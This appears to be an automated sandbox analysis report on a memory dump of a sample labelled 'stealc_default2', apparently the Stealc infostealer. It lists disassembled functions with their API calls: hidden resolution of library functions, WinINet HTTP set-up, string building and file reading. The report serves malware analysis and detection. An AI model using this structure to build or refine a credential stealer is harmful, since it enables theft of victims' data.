GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,00800268,00000000,?,00CC0E10,00000000,?,00000000,00000000), ref: 00CB7A63
HeapAlloc.KERNEL32(00000000,?,?,?,00000000,00000000,?,00800268,00000000,?,00CC0E10,00000000,?,00000000,00000000,?), ref: 00CB7A6A
GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,00800268,00000000,?,00CC0E10,00000000,?,00000000,00000000,?), ref: 00CB7A7D
wsprintfA.USER32 ref: 00CB7AB7

Memory Dump Source

Source File: 0000000E.00000002.2886787568.0000000000CA1000.00000080.00000001.01000000.0000000B.sdmp, Offset: 00CA0000, based on PE: true

Associated: 0000000E.00000002.2886760338.0000000000CA0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886820419.0000000000CBE000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886856854.0000000000CCB000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000CEA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000CFA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D25000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D28000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D2F000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D32000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D51000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D5D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D82000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D8F000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000DAF000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000DBB000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000DBE000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000E45000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000E65000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000E6B000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000EEA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2887482505.0000000000EFC000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_ca0000_stealc_default2.jbxd

Yara matches

Similarity

API ID: Heap$AllocInformationProcessTimeZonewsprintf
String ID:
API String ID: 362916592-0
Opcode ID: a7a9f1853e4521cd719357920b4d25e188b40bedf995caee2bc2eb421cff5d27
Instruction ID: cce7383aad24f5e90af1b7df325b9e8e9e935d3fc967820078b357050bbba7c5
Opcode Fuzzy Hash: a7a9f1853e4521cd719357920b4d25e188b40bedf995caee2bc2eb421cff5d27
Instruction Fuzzy Hash: A4118EB1945218EFEB208F55DC49FA9BB78FB44721F1043AAF91AA72C0D7742A44CF51

Function 00CA1160 Relevance: 3.0, APIs: 2, Instructions: 15COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,00CB6A17,00CC0AEF), ref: 00CA116A
ExitProcess.KERNEL32 ref: 00CA117E

Memory Dump Source

Source File: 0000000E.00000002.2886787568.0000000000CA1000.00000080.00000001.01000000.0000000B.sdmp, Offset: 00CA0000, based on PE: true

Associated: 0000000E.00000002.2886760338.0000000000CA0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886820419.0000000000CBE000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886856854.0000000000CCB000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000CEA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000CFA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D25000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D28000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D2F000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D32000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D51000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D5D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D82000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D8F000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000DAF000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000DBB000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000DBE000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000E45000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000E65000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000E6B000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000EEA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2887482505.0000000000EFC000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_ca0000_stealc_default2.jbxd

Yara matches

Similarity

API ID: ExitInfoProcessSystem
String ID:
API String ID: 752954902-0
Opcode ID: 18aa04da5e6ff873a807d90a039b94c9599eda26641542422d39683604d6552b
Instruction ID: ec702687337f6e576c3cf56484995a1bf2ec359fab07e5ef1d2c860924cfcfc2
Opcode Fuzzy Hash: 18aa04da5e6ff873a807d90a039b94c9599eda26641542422d39683604d6552b
Instruction Fuzzy Hash: 1BD05E7490030CDFCB00DFE1D8896EDBB78FB08316F040569ED0572340EA306486CAA6

Function 00CB9C10 Relevance: 200.2, APIs: 112, Strings: 2, Instructions: 684
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNEL32(75900000,007F7E38), ref: 00CB9C2D
GetProcAddress.KERNEL32(75900000,007F7D18), ref: 00CB9C45
GetProcAddress.KERNEL32(75900000,007F3D30), ref: 00CB9C5E
GetProcAddress.KERNEL32(75900000,007F3E80), ref: 00CB9C76
GetProcAddress.KERNEL32(75900000,007F3E98), ref: 00CB9C8E
GetProcAddress.KERNEL32(75900000,007F3C28), ref: 00CB9CA7
GetProcAddress.KERNEL32(75900000,007FA3F8), ref: 00CB9CBF
GetProcAddress.KERNEL32(75900000,007F3C40), ref: 00CB9CD7
GetProcAddress.KERNEL32(75900000,007F3EE0), ref: 00CB9CF0
GetProcAddress.KERNEL32(75900000,007F3F58), ref: 00CB9D08
GetProcAddress.KERNEL32(75900000,007F3F70), ref: 00CB9D20
GetProcAddress.KERNEL32(75900000,007F8098), ref: 00CB9D39
GetProcAddress.KERNEL32(75900000,007F7F98), ref: 00CB9D51
GetProcAddress.KERNEL32(75900000,007F7E18), ref: 00CB9D69
GetProcAddress.KERNEL32(75900000,007F7E98), ref: 00CB9D82
GetProcAddress.KERNEL32(75900000,007F3EF8), ref: 00CB9D9A
GetProcAddress.KERNEL32(75900000,007F3F88), ref: 00CB9DB2
GetProcAddress.KERNEL32(75900000,007FA5B0), ref: 00CB9DCB
GetProcAddress.KERNEL32(75900000,007F7F58), ref: 00CB9DE3
GetProcAddress.KERNEL32(75900000,007F3F10), ref: 00CB9DFB
GetProcAddress.KERNEL32(75900000,007F3F28), ref: 00CB9E14
GetProcAddress.KERNEL32(75900000,007F3F40), ref: 00CB9E2C
GetProcAddress.KERNEL32(75900000,007F3FA0), ref: 00CB9E44
GetProcAddress.KERNEL32(75900000,007F7ED8), ref: 00CB9E5D
GetProcAddress.KERNEL32(75900000,007FFA58), ref: 00CB9E75
GetProcAddress.KERNEL32(75900000,007FFA28), ref: 00CB9E8D
GetProcAddress.KERNEL32(75900000,007FFA88), ref: 00CB9EA6
GetProcAddress.KERNEL32(75900000,007FF8D8), ref: 00CB9EBE
GetProcAddress.KERNEL32(75900000,007FF830), ref: 00CB9ED6
GetProcAddress.KERNEL32(75900000,007FF860), ref: 00CB9EEF
GetProcAddress.KERNEL32(75900000,007FF848), ref: 00CB9F07
GetProcAddress.KERNEL32(75900000,007FFAA0), ref: 00CB9F1F
GetProcAddress.KERNEL32(75900000,007FF8A8), ref: 00CB9F38
GetProcAddress.KERNEL32(75900000,007F4880), ref: 00CB9F50
GetProcAddress.KERNEL32(75900000,007FFA40), ref: 00CB9F68
GetProcAddress.KERNEL32(75900000,007FF980), ref: 00CB9F81
GetProcAddress.KERNEL32(75900000,007F7D58), ref: 00CB9F99
GetProcAddress.KERNEL32(75900000,007FFA70), ref: 00CB9FB1
GetProcAddress.KERNEL32(75900000,007F7EF8), ref: 00CB9FCA
GetProcAddress.KERNEL32(75900000,007FF9F8), ref: 00CB9FE2
GetProcAddress.KERNEL32(75900000,007FFAB8), ref: 00CB9FFA
GetProcAddress.KERNEL32(75900000,007F7F18), ref: 00CBA013
GetProcAddress.KERNEL32(75900000,007F7F38), ref: 00CBA02B
LoadLibraryA.KERNEL32(007FF818,?,00CB5CA3,?,00000034,00000064,00CB6600,?,0000002C,00000064,00CB65A0,?,00000030,00000064,Function_00015AD0,?), ref: 00CBA03D
LoadLibraryA.KERNEL32(007FFAD0,?,00CB5CA3,?,00000034,00000064,00CB6600,?,0000002C,00000064,00CB65A0,?,00000030,00000064,Function_00015AD0,?), ref: 00CBA04E
LoadLibraryA.KERNEL32(007FF878,?,00CB5CA3,?,00000034,00000064,00CB6600,?,0000002C,00000064,00CB65A0,?,00000030,00000064,Function_00015AD0,?), ref: 00CBA060
LoadLibraryA.KERNEL32(007FF890,?,00CB5CA3,?,00000034,00000064,00CB6600,?,0000002C,00000064,00CB65A0,?,00000030,00000064,Function_00015AD0,?), ref: 00CBA072
LoadLibraryA.KERNEL32(007FF9E0,?,00CB5CA3,?,00000034,00000064,00CB6600,?,0000002C,00000064,00CB65A0,?,00000030,00000064,Function_00015AD0,?), ref: 00CBA083
LoadLibraryA.KERNEL32(007FF9B0,?,00CB5CA3,?,00000034,00000064,00CB6600,?,0000002C,00000064,00CB65A0,?,00000030,00000064,Function_00015AD0,?), ref: 00CBA095
LoadLibraryA.KERNEL32(007FFA10,?,00CB5CA3,?,00000034,00000064,00CB6600,?,0000002C,00000064,00CB65A0,?,00000030,00000064,Function_00015AD0,?), ref: 00CBA0A7
LoadLibraryA.KERNEL32(007FF938,?,00CB5CA3,?,00000034,00000064,00CB6600,?,0000002C,00000064,00CB65A0,?,00000030,00000064,Function_00015AD0,?), ref: 00CBA0B8
GetProcAddress.KERNEL32(75FD0000,007F82F8), ref: 00CBA0DA
GetProcAddress.KERNEL32(75FD0000,007FF7E8), ref: 00CBA0F2
GetProcAddress.KERNEL32(75FD0000,007FD678), ref: 00CBA10A
GetProcAddress.KERNEL32(75FD0000,007FF998), ref: 00CBA123
GetProcAddress.KERNEL32(75FD0000,007F83B8), ref: 00CBA13B
GetProcAddress.KERNEL32(735A0000,007FA308), ref: 00CBA160
GetProcAddress.KERNEL32(735A0000,007F82B8), ref: 00CBA179
GetProcAddress.KERNEL32(735A0000,007FA218), ref: 00CBA191
GetProcAddress.KERNEL32(735A0000,007FF8C0), ref: 00CBA1A9
GetProcAddress.KERNEL32(735A0000,007FF800), ref: 00CBA1C2
GetProcAddress.KERNEL32(735A0000,007F8378), ref: 00CBA1DA
GetProcAddress.KERNEL32(735A0000,007F8498), ref: 00CBA1F2
GetProcAddress.KERNEL32(735A0000,007FF9C8), ref: 00CBA20B
GetProcAddress.KERNEL32(763B0000,007F8478), ref: 00CBA22C
GetProcAddress.KERNEL32(763B0000,007F8318), ref: 00CBA244
GetProcAddress.KERNEL32(763B0000,007FF950), ref: 00CBA25D
GetProcAddress.KERNEL32(763B0000,007FF8F0), ref: 00CBA275
GetProcAddress.KERNEL32(763B0000,007F8298), ref: 00CBA28D
GetProcAddress.KERNEL32(750F0000,007FA560), ref: 00CBA2B3
GetProcAddress.KERNEL32(750F0000,007FA420), ref: 00CBA2CB
GetProcAddress.KERNEL32(750F0000,007FF908), ref: 00CBA2E3
GetProcAddress.KERNEL32(750F0000,007F82D8), ref: 00CBA2FC
GetProcAddress.KERNEL32(750F0000,007F8398), ref: 00CBA314
GetProcAddress.KERNEL32(750F0000,007FA4E8), ref: 00CBA32C
GetProcAddress.KERNEL32(75A50000,007FF920), ref: 00CBA352
GetProcAddress.KERNEL32(75A50000,007F8118), ref: 00CBA36A
GetProcAddress.KERNEL32(75A50000,007FD758), ref: 00CBA382
GetProcAddress.KERNEL32(75A50000,007FF968), ref: 00CBA39B
GetProcAddress.KERNEL32(75A50000,007FFB18), ref: 00CBA3B3
GetProcAddress.KERNEL32(75A50000,007F81D8), ref: 00CBA3CB
GetProcAddress.KERNEL32(75A50000,007F83D8), ref: 00CBA3E4
GetProcAddress.KERNEL32(75A50000,007FFB00), ref: 00CBA3FC
GetProcAddress.KERNEL32(75A50000,007FFB48), ref: 00CBA414
GetProcAddress.KERNEL32(75070000,007F81B8), ref: 00CBA436
GetProcAddress.KERNEL32(75070000,007FFB60), ref: 00CBA44E
GetProcAddress.KERNEL32(75070000,007FFAE8), ref: 00CBA466
GetProcAddress.KERNEL32(75070000,007FFB30), ref: 00CBA47F
GetProcAddress.KERNEL32(75070000,007FFB78), ref: 00CBA497
GetProcAddress.KERNEL32(74E50000,007F83F8), ref: 00CBA4B8
GetProcAddress.KERNEL32(74E50000,007F8198), ref: 00CBA4D1
GetProcAddress.KERNEL32(75320000,007F8338), ref: 00CBA4F2
GetProcAddress.KERNEL32(75320000,007FFB90), ref: 00CBA50A
GetProcAddress.KERNEL32(6F060000,007F8458), ref: 00CBA530
GetProcAddress.KERNEL32(6F060000,007F80F8), ref: 00CBA548
GetProcAddress.KERNEL32(6F060000,007F8178), ref: 00CBA560
GetProcAddress.KERNEL32(6F060000,007FFBA8), ref: 00CBA579
GetProcAddress.KERNEL32(6F060000,007F81F8), ref: 00CBA591
GetProcAddress.KERNEL32(6F060000,007F8358), ref: 00CBA5A9
GetProcAddress.KERNEL32(6F060000,007F8218), ref: 00CBA5C2
GetProcAddress.KERNEL32(6F060000,007F8438), ref: 00CBA5DA
GetProcAddress.KERNEL32(6F060000,InternetSetOptionA), ref: 00CBA5F1
GetProcAddress.KERNEL32(6F060000,HttpQueryInfoA), ref: 00CBA607
GetProcAddress.KERNEL32(74E00000,008000E8), ref: 00CBA629
GetProcAddress.KERNEL32(74E00000,007FD648), ref: 00CBA641
GetProcAddress.KERNEL32(74E00000,00800148), ref: 00CBA659
GetProcAddress.KERNEL32(74E00000,007FFFB0), ref: 00CBA672
GetProcAddress.KERNEL32(74DF0000,007F8138), ref: 00CBA693
GetProcAddress.KERNEL32(6BF90000,008001C0), ref: 00CBA6B4
GetProcAddress.KERNEL32(6BF90000,007F8158), ref: 00CBA6CD
GetProcAddress.KERNEL32(6BF90000,007FFFC8), ref: 00CBA6E5
GetProcAddress.KERNEL32(6BF90000,007FFF68), ref: 00CBA6FD

Strings

HttpQueryInfoA, xrefs: 00CBA5FC
InternetSetOptionA, xrefs: 00CBA5E5

Memory Dump Source

Source File: 0000000E.00000002.2886787568.0000000000CA1000.00000080.00000001.01000000.0000000B.sdmp, Offset: 00CA0000, based on PE: true

Associated: 0000000E.00000002.2886760338.0000000000CA0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886820419.0000000000CBE000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886856854.0000000000CCB000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000CEA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000CFA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D25000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D28000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D2F000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D32000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D51000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D5D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D82000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D8F000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000DAF000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000DBB000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000DBE000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000E45000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000E65000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000E6B000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000EEA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2887482505.0000000000EFC000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_ca0000_stealc_default2.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID: HttpQueryInfoA$InternetSetOptionA
API String ID: 2238633743-1775429166
Opcode ID: 973cc9c39ccdadcb79aeb5459d19b6e568bedcf3861d8b214c717a023d9fc723
Instruction ID: 5a699504bb1e1ade664a15fed1326831be13067365ea39d19b1012cf4fb2580a
Opcode Fuzzy Hash: 973cc9c39ccdadcb79aeb5459d19b6e568bedcf3861d8b214c717a023d9fc723
Instruction Fuzzy Hash: 9E623DB5500288AFC358DFAAEDC89563BF9F74C30170D853EB605EB264D639B489CB16

Function 00CA7710 Relevance: 81.6, APIs: 54, Instructions: 584
stringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32(00000000,0098967F,?,00CB61C4,?), ref: 00CA7724
RtlAllocateHeap.NTDLL(00000000,?,00CB61C4,?), ref: 00CA772B
lstrcatA.KERNEL32(?,007FCDE0,?,000003E8,?,000003E8,?,000003E8,?,000003E8,?,000003E8,?,000003E8,?,000003E8), ref: 00CA78DB
lstrcatA.KERNEL32(?,?,?,00CB61C4,?), ref: 00CA78EF
lstrcatA.KERNEL32(?,?,?,00CB61C4,?), ref: 00CA7903
lstrcatA.KERNEL32(?,?,?,00CB61C4,?), ref: 00CA7917
lstrcatA.KERNEL32(?,007FFCE0,?,00CB61C4,?), ref: 00CA792B
lstrcatA.KERNEL32(?,007FFD10,?,00CB61C4,?), ref: 00CA793F
lstrcatA.KERNEL32(?,007FFDE8,?,00CB61C4,?), ref: 00CA7952
lstrcatA.KERNEL32(?,007FFD28,?,00CB61C4,?), ref: 00CA7966
lstrcatA.KERNEL32(?,007FCE68,?,00CB61C4,?), ref: 00CA797A
lstrcatA.KERNEL32(?,?,?,00CB61C4,?), ref: 00CA798E
lstrcatA.KERNEL32(?,?,?,00CB61C4,?), ref: 00CA79A2
lstrcatA.KERNEL32(?,?,?,00CB61C4,?), ref: 00CA79B6
lstrcatA.KERNEL32(?,007FFCE0,?,00CB61C4,?), ref: 00CA79C9
lstrcatA.KERNEL32(?,007FFD10,?,00CB61C4,?), ref: 00CA79DD
lstrcatA.KERNEL32(?,007FFDE8,?,00CB61C4,?), ref: 00CA79F1
lstrcatA.KERNEL32(?,007FFD28,?,00CB61C4,?), ref: 00CA7A04
lstrcatA.KERNEL32(?,00800FD0,?,00CB61C4,?), ref: 00CA7A18
lstrcatA.KERNEL32(?,?,?,00CB61C4,?), ref: 00CA7A2C
lstrcatA.KERNEL32(?,?,?,00CB61C4,?), ref: 00CA7A40
lstrcatA.KERNEL32(?,?,?,00CB61C4,?), ref: 00CA7A54
lstrcatA.KERNEL32(?,007FFCE0,?,00CB61C4,?), ref: 00CA7A68
lstrcatA.KERNEL32(?,007FFD10,?,00CB61C4,?), ref: 00CA7A7B
lstrcatA.KERNEL32(?,007FFDE8,?,00CB61C4,?), ref: 00CA7A8F
lstrcatA.KERNEL32(?,007FFD28,?,00CB61C4,?), ref: 00CA7AA3
lstrcatA.KERNEL32(?,00801038,?,00CB61C4,?), ref: 00CA7AB6
lstrcatA.KERNEL32(?,?,?,00CB61C4,?), ref: 00CA7ACA
lstrcatA.KERNEL32(?,?,?,00CB61C4,?), ref: 00CA7ADE
lstrcatA.KERNEL32(?,?,?,00CB61C4,?), ref: 00CA7AF2
lstrcatA.KERNEL32(?,007FFCE0,?,00CB61C4,?), ref: 00CA7B06
lstrcatA.KERNEL32(?,007FFD10,?,00CB61C4,?), ref: 00CA7B1A
lstrcatA.KERNEL32(?,007FFDE8,?,00CB61C4,?), ref: 00CA7B2D
lstrcatA.KERNEL32(?,007FFD28,?,00CB61C4,?), ref: 00CA7B41
lstrcatA.KERNEL32(?,008010A0,?,00CB61C4,?), ref: 00CA7B55
lstrcatA.KERNEL32(?,?,?,00CB61C4,?), ref: 00CA7B69
lstrcatA.KERNEL32(?,?,?,00CB61C4,?), ref: 00CA7B7D
lstrcatA.KERNEL32(?,?,?,00CB61C4,?), ref: 00CA7B91
lstrcatA.KERNEL32(?,007FFCE0,?,00CB61C4,?), ref: 00CA7BA4
lstrcatA.KERNEL32(?,007FFD10,?,00CB61C4,?), ref: 00CA7BB8
lstrcatA.KERNEL32(?,007FFDE8,?,00CB61C4,?), ref: 00CA7BCC
lstrcatA.KERNEL32(?,007FFD28,?,00CB61C4,?), ref: 00CA7BDF
lstrcatA.KERNEL32(?,00801108,?,00CB61C4,?), ref: 00CA7BF3
lstrcatA.KERNEL32(?,?,?,00CB61C4,?), ref: 00CA7C07
lstrcatA.KERNEL32(?,?,?,00CB61C4,?), ref: 00CA7C1B
lstrcatA.KERNEL32(?,?,?,00CB61C4,?), ref: 00CA7C2F
lstrcatA.KERNEL32(?,007FFCE0,?,00CB61C4,?), ref: 00CA7C43
lstrcatA.KERNEL32(?,007FFD10,?,00CB61C4,?), ref: 00CA7C56
lstrcatA.KERNEL32(?,007FFDE8,?,00CB61C4,?), ref: 00CA7C6A
lstrcatA.KERNEL32(?,007FFD28,?,00CB61C4,?), ref: 00CA7C7E

Part of subcall function 00CA75D0: lstrcatA.KERNEL32(330DB020,00CC17FC,00CA7C90,80000001,00CB61C4,?,?,?,?,?,00CA7C90,?,?,00CB61C4), ref: 00CA7606
Part of subcall function 00CA75D0: lstrcatA.KERNEL32(330DB020,00000000,00000000), ref: 00CA7648
Part of subcall function 00CA75D0: lstrcatA.KERNEL32(330DB020, : ), ref: 00CA765A
Part of subcall function 00CA75D0: lstrcatA.KERNEL32(330DB020,00000000,00000000,00000000), ref: 00CA768F
Part of subcall function 00CA75D0: lstrcatA.KERNEL32(330DB020,00CC1804), ref: 00CA76A0
Part of subcall function 00CA75D0: lstrcatA.KERNEL32(330DB020,00000000,00000000,00000000), ref: 00CA76D3
Part of subcall function 00CA75D0: lstrcatA.KERNEL32(330DB020,00CC1808), ref: 00CA76ED
Part of subcall function 00CA75D0: task.LIBCPMTD ref: 00CA76FB

lstrcatA.KERNEL32(?,007FD428,?,00000104), ref: 00CA7E0B
lstrcatA.KERNEL32(?,00800E58), ref: 00CA7E1E
lstrlenA.KERNEL32(330DB020), ref: 00CA7E2B
lstrlenA.KERNEL32(330DB020), ref: 00CA7E3B

Part of subcall function 00CBA740: lstrcpy.KERNEL32(00CC0AEF,00000000), ref: 00CBA788

Memory Dump Source

Source File: 0000000E.00000002.2886787568.0000000000CA1000.00000080.00000001.01000000.0000000B.sdmp, Offset: 00CA0000, based on PE: true

Associated: 0000000E.00000002.2886760338.0000000000CA0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886820419.0000000000CBE000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886856854.0000000000CCB000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000CEA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000CFA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D25000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D28000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D2F000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D32000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D51000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D5D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D82000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D8F000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000DAF000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000DBB000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000DBE000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000E45000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000E65000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000E6B000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000EEA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2887482505.0000000000EFC000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_ca0000_stealc_default2.jbxd

Yara matches

Similarity

API ID: lstrcat$Heaplstrlen$AllocateProcesslstrcpytask
String ID:
API String ID: 928082926-0
Opcode ID: 63577241bf2521cd756fcea0f83cd931d57423894ca375a12ddf4728ca9598f5
Instruction ID: d028f07c0f1e1b5fd1ae54f213686a5409baa0d3429ee9d0cdd87dd4c8aa79bb
Opcode Fuzzy Hash: 63577241bf2521cd756fcea0f83cd931d57423894ca375a12ddf4728ca9598f5
Instruction Fuzzy Hash: 7B321DB2D00358ABDB15EBA0DCC9DEA737CBB44700F044A98F219A6091EE74E789DF55

Function 00CB0250 Relevance: 73.9, APIs: 32, Strings: 10, Instructions: 363
stringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00CBA740: lstrcpy.KERNEL32(00CC0AEF,00000000), ref: 00CBA788

Part of subcall function 00CB8DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00CB8E0B

Part of subcall function 00CBA920: lstrcpy.KERNEL32(00000000,?), ref: 00CBA972
Part of subcall function 00CBA920: lstrcatA.KERNEL32(00000000), ref: 00CBA982

Part of subcall function 00CBA8A0: lstrcpy.KERNEL32(?,00CC0AEF), ref: 00CBA905

Part of subcall function 00CBA9B0: lstrlenA.KERNEL32(?,00CC1110,?,00000000,00CC0AEF), ref: 00CBA9C5
Part of subcall function 00CBA9B0: lstrcpy.KERNEL32(00000000), ref: 00CBAA04
Part of subcall function 00CBA9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 00CBAA12

Part of subcall function 00CBA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00CBA7E6

Part of subcall function 00CA99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00CA99EC
Part of subcall function 00CA99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00CA9A11
Part of subcall function 00CA99C0: LocalAlloc.KERNEL32(00000040,?), ref: 00CA9A31
Part of subcall function 00CA99C0: ReadFile.KERNEL32(000000FF,?,00000000,00CB02E7,00000000), ref: 00CA9A5A
Part of subcall function 00CA99C0: LocalFree.KERNEL32(00CB02E7), ref: 00CA9A90
